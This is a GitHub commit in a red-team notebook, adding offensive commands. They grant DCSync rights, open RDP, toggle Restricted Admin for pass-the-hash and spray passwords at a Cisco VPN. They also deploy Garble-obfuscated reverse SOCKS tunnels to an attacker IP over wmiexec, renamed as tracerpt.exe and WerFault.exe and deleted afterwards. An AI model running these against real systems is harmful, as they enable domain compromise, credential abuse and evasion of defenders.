Skip to content

Commit

Permalink
[AHK] Automatic update 👽
Browse files Browse the repository at this point in the history
  • Loading branch information
snovvcrash committed Apr 13, 2023
1 parent cc15631 commit 18227a7
Show file tree
Hide file tree
Showing 9 changed files with 98 additions and 7 deletions.
1 change: 1 addition & 0 deletions SUMMARY.md
Original file line number Diff line number Diff line change
Expand Up @@ -187,6 +187,7 @@
* [Shellcode Runners](redteam/maldev/code-injection/shellcode-runners.md)
- [D/Invoke](redteam/maldev/dinvoke.md)
- [DLL Hijacking](redteam/maldev/dll-hijacking.md)
- [Golang](redteam/maldev/golang.md)
- [Nim](redteam/maldev/nim.md)
- [Sandbox Evasion](redteam/maldev/sandbox-evasion.md)
- [Shellcodes](redteam/maldev/shellcodes.md)
Expand Down
2 changes: 1 addition & 1 deletion pentest/infrastructure/ad/acl-abuse.md
Original file line number Diff line number Diff line change
Expand Up @@ -266,7 +266,7 @@ $ ntlmrelayx.py -t ldap://DC01.megacorp.local --escalate-user snovvcrash --no-sm
Using Impacket **dacledit.py**:

```
$ dacledit.py megacorp.local/snovvcrash:'Passw0rd!' -action write -rights DCSync -principal snovvcrash -targer-dn 'DC=megacorp,DC=local' -dc-ip 192.168.1.11
$ dacledit.py megacorp.local/snovvcrash:'Passw0rd!' -action write -rights DCSync -principal snovvcrash -target-dn 'DC=megacorp,DC=local' -dc-ip 192.168.1.11
```

Using **PowerView2**:
Expand Down
1 change: 1 addition & 0 deletions pentest/infrastructure/ad/gpo-abuse.md
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@ description: Group Policy Objects
* [https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
* [https://wald0.com/?p=179](https://wald0.com/?p=179)
* [https://github.com/EvotecIT/GPOZaurr](https://github.com/EvotecIT/GPOZaurr)
* [https://xakep.ru/2023/02/01/exploiting-gpo/](https://xakep.ru/2023/02/01/exploiting-gpo/)

Force GPO update on all domain computers:

Expand Down
11 changes: 10 additions & 1 deletion pentest/infrastructure/ad/kerberos/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,6 @@
- [https://habr.com/ru/company/tomhunter/blog/509290/](https://habr.com/ru/company/tomhunter/blog/509290/)
- [https://ardent101.github.io/posts/kerberos_theory/](https://ardent101.github.io/posts/kerberos_theory/)
- [https://ardent101.github.io/posts/kerberos_general_attacks/](https://ardent101.github.io/posts/kerberos_general_attacks/)
- [https://github.com/OtterHacker/Cerbere](https://github.com/OtterHacker/Cerbere)

{% embed url="https://youtu.be/qZPvgoUzCdI" %}

Expand Down Expand Up @@ -64,6 +63,15 @@ python3 keytab.py keytab.kt



## Manual Tickets Injection

- [https://github.com/OtterHacker/Cerbere](https://github.com/OtterHacker/Cerbere)
- [https://xakep.ru/2023/04/04/no-mimikatz/](https://xakep.ru/2023/04/04/no-mimikatz/)
- [https://github.com/MzHmO/articles/tree/main/Ticket%20Injector](https://github.com/MzHmO/articles/tree/main/Ticket%20Injector)




## Kerberos on Linux

- [https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory)
Expand Down Expand Up @@ -122,3 +130,4 @@ A blog series by [@n0pe_sled](https://medium.com/@n0pe_sled) on attacking FreeIP
- [Attacking FreeIPA — Part II Enumeration](https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1)
- [Attacking FreeIPA — Part III: Finding A Path](https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405b5b95e)
- [Attacking FreeIPA — Part IV: CVE-2020–10747](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b)
- [https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting](https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting)
13 changes: 10 additions & 3 deletions pentest/infrastructure/ad/lateral-movement/rdp.md
Original file line number Diff line number Diff line change
Expand Up @@ -26,6 +26,13 @@ PS > Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
PS > Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1
```

Manually add firewall rule (if necessary):

```
Cmd > netsh advfirewall firewall add rule name="Allow Remote Desktop" dir=in protocol=TCP localport=3389 action=allow
PS > New-NetFirewallRule -DisplayName 'Allow Remote Desktop' -Profile @('Domain', 'Private') -Direction Inbound -Action Allow -Protocol TCP -LocalPort @('3389')
```




Expand All @@ -39,7 +46,7 @@ PS > Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Ser

RDP with [PtH](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/): RDP needs a plaintext password unless Restricted Admin mode is enabled.

Check / enable / delete with PowerShell:
Check / enable / disable with PowerShell:

```
PS > Get-ChildItem "HKLM:\System\CurrentControlSet\Control\Lsa" -Recurse
Expand All @@ -50,14 +57,14 @@ PS > Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "Disabl
PS > Remove-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin"
```

Check / enable / delete with Impacket:
Check / enable / disable with impacket:

```
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -s
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin -vt REG_DWORD -vd 0
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin -vt REG_DWORD -vd 1
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 delete -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl' -v DisableRestrictedAdmin
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 delete -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin
```

Enable with CME:
Expand Down
3 changes: 3 additions & 0 deletions pentest/infrastructure/ad/lateral-movement/wmi.md
Original file line number Diff line number Diff line change
Expand Up @@ -55,6 +55,9 @@ Get-WmiObject -Class Win32_Group | ft -AutoSize

## wmiexec.py

- [https://github.com/XiaoliChan/wmiexec-RegOut](https://github.com/XiaoliChan/wmiexec-RegOut)
- [https://github.com/XiaoliChan/wmiexec-Pro]()

```
$ wmiexec.py -codec cp866 snovvcrash:'Passw0rd!'@192.168.1.11
$ wmiexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 [email protected]
Expand Down
32 changes: 30 additions & 2 deletions pentest/infrastructure/pivoting.md
Original file line number Diff line number Diff line change
Expand Up @@ -282,13 +282,12 @@ Other `xfreerdp` tips:

- [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
- [https://github.com/ginuerzh/gost](https://github.com/ginuerzh/gost)
- [https://github.com/llkat/rsockstun](https://github.com/llkat/rsockstun)
- [https://github.com/sysdream/ligolo](https://github.com/sysdream/ligolo)
- [https://github.com/nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng)



### proxychains-ng
### proxychains4 (proxychains-ng)

* [https://github.com/rofl0r/proxychains-ng](https://github.com/rofl0r/proxychains-ng)

Expand Down Expand Up @@ -322,6 +321,10 @@ $ sshuttle -vr [email protected] 192.168.1.0/24 -e "ssh -i ./key"
- [https://github.com/jpillora/chisel/releases](https://github.com/jpillora/chisel/releases)
- [https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel](https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel)

{% content-ref url="/redteam/maldev/golang.md" %}
[golang.md](golang.md)
{% endcontent-ref %}

{% embed url="https://snovvcrash.github.io/2020/03/17/htb-reddish.html#chisel-socks" caption="HTB Reddish: Chisel SOCKS" %}

* Attacker's IP: `10.10.13.37`
Expand Down Expand Up @@ -361,6 +364,14 @@ snovvcrash@kali:~$ ./chisel server -p 8000 --reverse --socks5 [--auth snovvcrash
alice@victim:~$ nohup ./chisel client [--fingerprint <BASE64_STRING>] [--auth snovvcrash:'Passw0rd!'] 10.10.13.37:8000 R:[127.0.0.1:1080:]socks &
```

Quicky:

```
$ wmiexec.py -nooutput megacorp.local/[email protected] 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"'
$ sudo chisel client -v --auth snovvcrash:'Passw0rd!' 192.168.1.11:8000 127.0.0.1:1080:socks
$ wmiexec.py -nooutput megacorp.local/[email protected] 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe'
```


#### Double SOCKS Proxy

Expand Down Expand Up @@ -398,6 +409,23 @@ alice@victim:~$ ./revsocks -connect 10.14.14.3:8000 -pass 'Passw0rd!'



### rsockstun

- [https://github.com/llkat/rsockstun](https://github.com/llkat/rsockstun)

{% content-ref url="/redteam/maldev/golang.md" %}
[golang.md](golang.md)
{% endcontent-ref %}

```
$ openssl req -new -x509 -keyout cert.key -out cert.crt -days 365 -nodes
$ sudo rsockstun -listen :8000 -socks 127.0.0.1:1080 -cert cert -pass 'Passw0rd!'
$ wmiexec.py -nooutput megacorp.local/[email protected] 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"'
$ wmiexec.py -nooutput megacorp.local/[email protected] 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe'
```



### Neo-reGeorg

* [https://github.com/L-codes/Neo-reGeorg](https://github.com/L-codes/Neo-reGeorg)
Expand Down
13 changes: 13 additions & 0 deletions pentest/perimeter/cisco.md
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,19 @@



## Brute Force Authentication

- [https://github.com/R3dy/ciscobruter](https://github.com/R3dy/ciscobruter)

Manually in a dirty way:

```
$ for user in `cat users.txt`; do echo 'Passw0rd!' | sudo openconnect vpn.contoso.com --user=$user --passwd-on-stdin --servercert=pin-sha256:<BASE64> | tee -a openconnect.log; done
```




## ASA Path Traversal

**CVE-2020-3452**
Expand Down
29 changes: 29 additions & 0 deletions redteam/maldev/golang.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
# Golang

- [https://www.redteam.cafe/red-team/golang/red-team-how-to-embed-golang-tools-in-c](https://www.redteam.cafe/red-team/golang/red-team-how-to-embed-golang-tools-in-c)




## Obfuscate Go Tooling



### garble

Example with [chisel](https://github.com/jpillora/chisel):

```
$ go install mvdan.cc/garble@latest
$ go install github.com/jpillora/chisel@latest
$ git clone https://github.com/jpillora/chisel chisel-src && cd chisel-src
$ env CGO_ENABLE=1 GOOS=windows GOARCH=amd64 garble -literals -tiny build -trimpath
```

Example with [rsockstun](https://github.com/llkat/rsockstun):

```
$ git clone https://github.com/llkat/rsockstun rsockstun-src && cd rsockstun-src
$ go mod init rsockstun && go mod tidy
$ env CGO_ENABLE=1 GOOS=windows GOARCH=amd64 garble -literals -tiny build -trimpath
```

0 comments on commit 18227a7

Please sign in to comment.